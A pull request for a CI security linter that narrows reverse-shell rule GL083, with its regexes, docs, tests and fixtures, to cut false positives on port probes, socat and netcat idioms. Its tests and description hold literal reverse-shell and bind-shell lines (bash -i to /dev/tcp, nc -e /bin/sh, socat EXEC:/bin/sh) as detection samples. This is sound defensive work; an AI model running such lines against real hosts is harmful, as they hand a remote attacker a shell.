### PR TITLE
fix(rules): remove four GL083 false-positive classes

### DIFF
--- a/docs/rules/GL083.md
+++ b/docs/rules/GL083.md
@@ -9,10 +9,10 @@ A script line that connects the runner back to a host of the author's choosing a
 
 | Pattern | What has to be on the same line |
 |---------|---------------------------------|
-| Shell redirected to a socket | `/dev/tcp/` or `/dev/udp/`, plus an interactive shell (`bash -i`) or a read-write descriptor (`exec 5<>/dev/tcp/…`) |
-| Netcat with command execution | `nc`, `ncat` or `netcat` with `-e`, `-c`, or `--exec`/`--sh-exec` |
+| Shell redirected to a socket | `/dev/tcp/` or `/dev/udp/`, plus an interactive shell (`bash -i`) |
+| Netcat with command execution | `nc`, `ncat` or `netcat` with `-e`, `-c` or `--exec`/`--sh-exec`, whose argument names a shell |
 | Named-pipe backdoor | `mkfifo` together with a netcat invocation |
-| socat with a program endpoint | `socat` together with `EXEC:` or `SYSTEM:` |
+| socat with a program endpoint | `socat` with `EXEC:` or `SYSTEM:` **and** a network address (`TCP:`, `TCP-LISTEN:`, `UDP:`, `OPENSSL:`) |
 | Interpreter socket one-liner | `python`, `perl` or `ruby` with a socket API plus `dup2`, `subprocess`, `pty.spawn` or `exec` |
 
 Every check needs a combination. Each token on its own has an ordinary use in CI, so none of them fires alone.
@@ -42,15 +42,22 @@ These are the idioms that a looser rule would break:
 
 ```yaml
 script:
-  - timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"  # wait for a service, no interactive shell
-  - nc -z postgres 5432                                           # port check, no -e/-c
-  - socat TCP-LISTEN:15432,fork TCP:postgres:5432 &               # port forward, no program endpoint
-  - mkfifo /tmp/logpipe && tail -f /tmp/logpipe                   # named pipe without netcat
+  - timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"       # wait for a service, no interactive shell
+  - if (exec 3<>/dev/tcp/postgres/5432) 2>/dev/null; then echo up; fi  # the same probe, read-write form
+  - nc -z postgres 5432                                                # port check, no -e/-c
+  - nc -lc "printf 'HTTP/1.1 200 OK\n\n'; cat report.json" -l 8080     # one-shot responder, the command is not a shell
+  - socat TCP-LISTEN:15432,fork TCP:postgres:5432 &                    # port forward, no program endpoint
+  - socat EXEC:'psql -c "select 1"',pty,setsid,ctty STDIO,ignoreeof    # local command, no network endpoint
+  - mkfifo /tmp/logpipe && tail -f /tmp/logpipe                        # named pipe without netcat
+  - rsync -e "ssh -i ~/.ssh/id_rsa" -az dist/ user@host:/srv/          # rsync's -e, no word boundary before "nc" in "rsync"
 ```
+
+The read-write descriptor form deserves a note of its own. `exec 3<>/dev/tcp/host/port` reads like a reverse shell but is the ordinary way to probe a port in bash, and it appears in unrelated projects as a wait-for-service loop and even as a raw HTTP/1.0 client. What separates the two is the interactive shell, not the direction of the redirect.
 
 ## Notes
 
 - Quoted substrings are not stripped before matching. GL011 strips them so that a `| bash` inside a string literal stays quiet, but a reverse shell is routinely wrapped as `bash -c "bash -i >& /dev/tcp/…"`, and stripping quotes first would remove the payload.
+- Each physical line is evaluated on its own. A `|` block scalar reaches the rule as one script item, so without splitting, a netcat on one line would pair with a shell flag several lines below it. The reported message quotes the offending line, not the whole block, though the position still points at the start of the block.
 - A line is reported once, even when it carries more than one of the patterns above.
 - The rule reads the literal script text. A payload assembled at runtime from variables, or decoded from base64 into `sh`, is out of reach here; the base64 case is [GL011](GL011.md)'s.
 

--- a/rules/gl083.go
+++ b/rules/gl083.go
@@ -3,6 +3,7 @@ package rules
 import (
 	"fmt"
 	"regexp"
+	"strings"
 
 	"github.com/glsec/glsec/internal/finding"
 	"gopkg.in/yaml.v3"
@@ -19,24 +20,26 @@ var (
 	// /dev/tcp/host/port device.
 	socketRedirRe = regexp.MustCompile(`/dev/(?:tcp|udp)/`)
 	// interactiveShellRe matches a shell invoked with the interactive flag, in
-	// any of the -i, -it, -si spellings.
-	interactiveShellRe = regexp.MustCompile(`\b(?:ba|z|k|da)?sh\b[^|;&]*\s-[a-zA-Z]*i\b`)
-	// socketExecRe matches a socket opened read-write on a file descriptor:
-	// exec 5<>/dev/tcp/host/port. The read-write form is what distinguishes it
-	// from a one-way connectivity probe.
-	socketExecRe = regexp.MustCompile(`\bexec\s+\d+<>\s*/dev/(?:tcp|udp)/`)
+	// any of the -i, -it, -si spellings. The interactive flag is what separates
+	// a reverse shell from the wait-for-service probe, which opens the socket
+	// and closes it again without ever attaching a shell to it.
+	interactiveShellRe = regexp.MustCompile(`\b(?:ba|z|k|da)?sh\b[^|;&\n]*\s-[a-zA-Z]*i\b`)
 
-	// netcatExecRe matches netcat asked to run a program on connect. -e and -c
-	// are the traditional and ncat spellings; both hand a shell to the peer.
-	netcatExecRe = regexp.MustCompile(`\b(?:nc|ncat|netcat)(?:\.traditional|\.openbsd)?\b[^|;&]*(?:\s-[a-zA-Z]*[ec]\b|\s--(?:exec|sh-exec|lua-exec)\b)`)
+	// netcatExecRe matches netcat asked to run a *shell* on connect. The flag
+	// alone is not enough: nc -lc "printf ..." is a one-shot HTTP responder, so
+	// the argument has to name a shell.
+	netcatExecRe = regexp.MustCompile(`\b(?:nc|ncat|netcat)(?:\.traditional|\.openbsd)?\b[^|;&\n]*(?:\s-[a-zA-Z]*[ec]\b|\s--(?:exec|sh-exec|lua-exec)\b)\s*['"]?\S*(?:\bsh\b|\bbash\b|\bzsh\b|\bash\b|\bdash\b|\bcmd(?:\.exe)?\b|\bpowershell\b)`)
 	// netcatRe matches any netcat invocation, used only in combination with mkfifo.
 	netcatRe = regexp.MustCompile(`\b(?:nc|ncat|netcat)(?:\.traditional|\.openbsd)?\b`)
 	mkfifoRe = regexp.MustCompile(`\bmkfifo\b`)
 
-	// socatExecRe matches socat wired to a program endpoint. socat address
-	// keywords are case-insensitive.
+	// socatRe, socatExecRe and socatNetRe together match socat wiring a program
+	// to a network peer. A program endpoint on its own is ordinary usage:
+	// socat EXEC:'...' STDIO drives a local command and never opens a socket.
+	// socat address keywords are case-insensitive.
 	socatRe     = regexp.MustCompile(`\bsocat\b`)
 	socatExecRe = regexp.MustCompile(`(?i)\b(?:exec|system):`)
+	socatNetRe  = regexp.MustCompile(`(?i)\b(?:tcp|udp|openssl|ssl|socks[45]a?)[46]?(?:-[a-z]+)?:`)
 
 	// interpreterRe, socketAPIRe and interpreterExecRe together match the
 	// scripting-language one-liners: an interpreter that opens a socket and
@@ -47,25 +50,28 @@ var (
 )
 
 // reverseShellKind returns a short description of the reverse-shell pattern in
-// line, or the empty string when the line carries none.
+// line, or the empty string when the line carries none. line is a single
+// physical line, never a whole block scalar: the character classes below skip
+// over shell separators, and letting them run past a newline would pair a
+// netcat on one line of a `|` block with a shell flag several lines down.
 //
 // Every check requires a combination. Each individual token here has ordinary
-// uses in CI: /dev/tcp is the standard wait-for-service probe, socat forwards
-// ports, nc -l is a throwaway test listener and mkfifo tees logs. It is the
-// pairing that has no innocent reading.
+// uses in CI: /dev/tcp is the standard wait-for-service probe, socat drives
+// local commands and forwards ports, nc -l is a throwaway test listener and
+// mkfifo tees logs. It is the pairing that has no innocent reading.
 //
 // Quoted substrings are deliberately not stripped the way GL011 strips them:
 // a reverse shell is routinely wrapped as bash -c "bash -i >& /dev/tcp/...",
 // and removing quotes first would remove the payload.
 func reverseShellKind(line string) string {
 	switch {
-	case socketRedirRe.MatchString(line) && (interactiveShellRe.MatchString(line) || socketExecRe.MatchString(line)):
+	case socketRedirRe.MatchString(line) && interactiveShellRe.MatchString(line):
 		return "shell redirected to a socket"
 	case netcatExecRe.MatchString(line):
 		return "netcat with command execution"
 	case mkfifoRe.MatchString(line) && netcatRe.MatchString(line):
 		return "named-pipe backdoor"
-	case socatRe.MatchString(line) && socatExecRe.MatchString(line):
+	case socatRe.MatchString(line) && socatExecRe.MatchString(line) && socatNetRe.MatchString(line):
 		return "socat with a program endpoint"
 	case interpreterRe.MatchString(line) && socketAPIRe.MatchString(line) && interpreterExecRe.MatchString(line):
 		return "interpreter socket one-liner"
@@ -76,7 +82,7 @@ func reverseShellKind(line string) string {
 func (r *gl083) Check(doc *yaml.Node, file string) []finding.Finding {
 	var findings []finding.Finding
 	EachScriptLine(doc, file, func(item *yaml.Node, file, job string) {
-		kind := reverseShellKind(item.Value)
+		kind, payload := scanReverseShell(item.Value)
 		if kind == "" {
 			return
 		}
@@ -85,7 +91,7 @@ func (r *gl083) Check(doc *yaml.Node, file string) []finding.Finding {
 			Severity: finding.Error,
 			Message: fmt.Sprintf(
 				"script line opens a shell to a remote host (%s): %q — this is a reverse shell; remove it",
-				kind, truncate(item.Value, 80),
+				kind, truncate(payload, 80),
 			),
 			File: file,
 			Line: item.Line,
@@ -94,4 +100,17 @@ func (r *gl083) Check(doc *yaml.Node, file string) []finding.Finding {
 		})
 	})
 	return findings
+}
+
+// scanReverseShell evaluates each physical line of a script item separately and
+// returns the first pattern found along with the line carrying it. A block
+// scalar arrives here as one item, so splitting is what keeps a match anchored
+// to a single command.
+func scanReverseShell(value string) (kind, payload string) {
+	for _, line := range strings.Split(value, "\n") {
+		if k := reverseShellKind(line); k != "" {
+			return k, strings.TrimSpace(line)
+		}
+	}
+	return "", ""
 }

--- a/rules/gl083_test.go
+++ b/rules/gl083_test.go
@@ -25,7 +25,6 @@ func TestGL083_Payloads(t *testing.T) {
 	}{
 		{"bash socket redirect", `bash -i >& /dev/tcp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
 		{"sh socket redirect", `/bin/sh -i >& /dev/tcp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
-		{"exec read-write socket", `exec 5<>/dev/tcp/198.51.100.7/4444 && cat <&5`, "shell redirected to a socket"},
 		{"udp socket redirect", `bash -i >& /dev/udp/198.51.100.7/4444 0>&1`, "shell redirected to a socket"},
 		{"quoted payload", `bash -c "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"`, "shell redirected to a socket"},
 		{"nc -e", `nc -e /bin/sh 198.51.100.7 4444`, "netcat with command execution"},
@@ -76,6 +75,14 @@ func TestGL083_LegitimateIdioms(t *testing.T) {
 		{"interactive-looking flag", `docker run -i --rm alpine:3.19.1 sh -c "echo hi"`},
 		{"python without socket", `python3 -c "import subprocess;subprocess.call(['make'])"`},
 		{"connectivity probe", `bash -c 'echo > /dev/tcp/redis/6379' && echo up`},
+		// The four false-positive classes found scanning 265 real pipelines (#480).
+		{"read-write port probe", `if (exec 3<>/dev/tcp/postgres/5432) 2>/dev/null; then echo up; fi`},
+		{"read-write probe in a subshell", `if bash -c 'exec 3<>/dev/tcp/127.0.0.1/11119' 2>/dev/null; then break; fi`},
+		{"raw http client over /dev/tcp", `bash -c "exec 3<>/dev/tcp/127.0.0.1/9095; cat >&3; cat <&3"`},
+		{"socat driving a local command", `timeout 1200 socat EXEC:'az containerapp exec --command /deploy.sh --name portal',pty,setsid,ctty STDIO,ignoreeof`},
+		{"netcat serving a fixed response", `nc -lc "printf 'HTTP/1.1 200 OK\n\n'; cat build/image.zip" -l 8080`},
+		{"rsync remote shell flag", `rsync -e "ssh -i ~/.ssh/id_rsa" -az dist/ user@host:/srv/`},
+		{"installing netcat then probing", `sh -c "apk add --no-cache netcat-openbsd && nc -z mailserver 25"`},
 	}
 
 	for _, tc := range cases {
@@ -150,5 +157,55 @@ job:
 		if x.Job != "" {
 			t.Errorf("expected empty job for a global/default block, got %q", x.Job)
 		}
+	}
+}
+
+// A `|` block scalar reaches the rule as a single item. Tokens on different
+// physical lines must not be paired: this block has a netcat probe on one line
+// and a `sh -c` several lines later, and neither is a reverse shell.
+func TestGL083_BlockScalarLinesAreSeparate(t *testing.T) {
+	f := findings083(t, `
+health:
+  script:
+    - |
+      echo "running health checks"
+      sh -c "apk add --no-cache netcat-openbsd && nc -z mailserver 25"
+      echo "mail ok"
+      sh -c "apk add --no-cache mariadb-client && mysqladmin ping"
+`)
+	if len(f) != 0 {
+		t.Fatalf("expected no finding across block scalar lines, got %d: %s", len(f), f[0].Message)
+	}
+}
+
+// The reported payload is the offending line, not the whole block.
+func TestGL083_ReportsTheOffendingLine(t *testing.T) {
+	f := findings083(t, `
+job:
+  script:
+    - |
+      echo "starting"
+      nc -e /bin/sh 198.51.100.7 4444
+      echo "done"
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding, got %d", len(f))
+	}
+	if !strings.Contains(f[0].Message, "nc -e /bin/sh") {
+		t.Errorf("message should quote the offending line, got %s", f[0].Message)
+	}
+	if strings.Contains(f[0].Message, "starting") {
+		t.Errorf("message should not quote the whole block, got %s", f[0].Message)
+	}
+}
+
+func TestGL083_SocatNeedsANetworkEndpoint(t *testing.T) {
+	f := findings083(t, `
+job:
+  script:
+    - socat TCP-LISTEN:4444,fork EXEC:/bin/sh
+`)
+	if len(f) != 1 {
+		t.Fatalf("expected 1 finding for a socat bind shell, got %d", len(f))
 	}
 }

--- a/testdata/fixtures/gl083-reverse-shell.yml
+++ b/testdata/fixtures/gl083-reverse-shell.yml
@@ -20,8 +20,12 @@ wait-for-db:
       alias: postgres
   script:
     - timeout 1 bash -c "cat < /dev/null > /dev/tcp/postgres/5432"
+    - if (exec 3<>/dev/tcp/postgres/5432) 2>/dev/null; then echo up; fi
     - nc -z postgres 5432
+    - sh -c "apk add --no-cache netcat-openbsd && nc -z postgres 5432"
+    - nc -lc "printf 'HTTP/1.1 200 OK\n\n'; cat report.json" -l 8080
     - socat TCP-LISTEN:15432,fork TCP:postgres:5432 &
+    - socat EXEC:'psql -h postgres -c "select 1"',pty,setsid,ctty STDIO,ignoreeof
     - psql -h postgres -c 'select 1'
 
 build:


### PR DESCRIPTION
Closes #480.

## What changed

Four false-positive classes removed from GL083, all found by scanning 265 real `.gitlab-ci.yml` files that actually contain the tokens the rule keys on.

**1. Dropped `socketExecRe`.** The socket-redirect case required `/dev/tcp` plus either an interactive shell or a read-write descriptor (`exec 3<>/dev/tcp/…`). The second half was wrong: that form is the ordinary bash port probe, used in four unrelated corpus projects as a wait-for-service loop and once as a raw HTTP/1.0 client. The case now requires the interactive shell it was originally specified with.

**2. socat needs a network endpoint.** `socat` plus `EXEC:`/`SYSTEM:` was enough to fire, which caught `socat EXEC:'az containerapp exec …',pty,setsid,ctty STDIO,ignoreeof` driving a local command. A reverse or bind shell always has an address opposite the program, so `socatNetRe` now requires one (`TCP:`, `TCP-LISTEN:`, `UDP:`, `OPENSSL:`, and the numbered variants).

**3. Per-line evaluation.** `[^|;&]` also matches a newline, and a `|` block scalar arrives as a single script item, so a `nc -z` on one line paired with a `sh -c` four lines further down. `scanReverseShell` now splits the item and evaluates each physical line, `\n` is excluded from those character classes, and the message quotes the offending line rather than the head of the block.

**4. netcat's exec flag must name a shell.** `nc -lc "printf 'HTTP/1.1 200 OK\n\n'; cat build/image.zip"` is a one-shot HTTP responder. It does use the command-execution flag, but the command is `printf`. The pattern now requires the argument to name a shell.

## Result on the same corpus

| | before | after |
|---|---|---|
| findings | 23 | **1** |
| of those correct | 1 | 1 |

The remaining finding is the one true positive, a deliberately insecure test fixture carrying `bash -i >& /dev/tcp/10.0.0.1/4444 0>&1`. No true positive was lost.

The earlier star-count corpus (198 files) still reports 0, and the rule still fires only on its own fixture across all 84 fixtures.

## Tests

The seven corpus idioms are now negative test cases in `TestGL083_LegitimateIdioms`, plus three new tests: block-scalar lines stay separate, the message quotes the offending line rather than the block, and a socat bind shell (`TCP-LISTEN:` + `EXEC:`) still fires. The fixture's `wait-for-db` job carries the same idioms so they are exercised end to end.

```bash
go test ./rules/ -run GL083
go test ./...
golangci-lint run ./...
check-jsonschema --builtin-schema gitlab-ci testdata/fixtures/gl083-reverse-shell.yml
```

## Note

Nothing here changes the rule's severity, metadata or ID, so no README or mapping updates are needed. The `extends:` duplication mentioned in the issue is untouched: GL024 and GL050 behave the same way, so it is existing uniform behaviour rather than a GL083 defect.
